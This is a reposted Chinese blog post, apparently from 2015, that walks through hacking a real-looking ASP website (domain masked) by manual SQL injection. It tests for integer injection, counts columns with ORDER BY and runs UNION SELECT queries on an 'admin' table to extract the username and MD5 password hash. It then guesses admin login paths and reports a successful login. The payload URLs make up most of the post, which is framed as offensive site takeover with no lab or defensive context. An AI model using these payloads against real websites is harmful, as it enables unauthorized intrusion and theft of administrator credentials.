码迷,mamicode.com
首页 > 数据库 > 详细

【实战】利用联合查询--手工SQL注入拿下网站

时间:2015-02-20 00:14:58      阅读:221      评论:0      收藏:0      [点我收藏+]

标签:sql注入   黑客   web入侵   啊d   明小子   

        看到很多脚本小子,工具党用啊D,明小子,穿山甲对网站扫来扫去,拿个后台什么的,其实基础是最重要的,今天我来说一下纯手工注入一个站点。

 

目标网址:http://www.******.com/about.asp?id=1

 

1.首先确认这里是否存在整型注入,很简单,url后加‘ and 1=1 and 1=2,不细说。同时我们还判断出这是Access的数据库。

技术分享

 

2.利用order by判断表项有几个;

    http://www.******.com/about.asp?id=1 order by 4(这里的5报错,4正确,就是4个了)

 

3.然后测试显示位,2,3位可显;

    http://www.******.com/about.asp?id=1 and 1=2 union select 1,2,3,4 from admin

技术分享

 

4.在显示位猜测字段值;这里的表名,字段名根据经验来试;常见的就那几种;我们得到了用户名和密码(MD5加密的);

    http://www.******.com/about.asp?id=1 and 1=2 union select 1,username,3,4 from admin
    http://www.******.com/about.asp?id=1 and 1=2 union select 1,password,3,4 from admin

技术分享

技术分享

 

5.拿到用户名密码后,寻找后台,常见的admin/login/manager/admin_login等可以试一试,成功登陆,搞定。提权后面再说咯。

技术分享

本文出自 “夜行者” 博客,转载请与作者联系!

【实战】利用联合查询--手工SQL注入拿下网站

标签:sql注入   黑客   web入侵   啊d   明小子   

原文地址:http://zerosecurity.blog.51cto.com/9913090/1614868

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!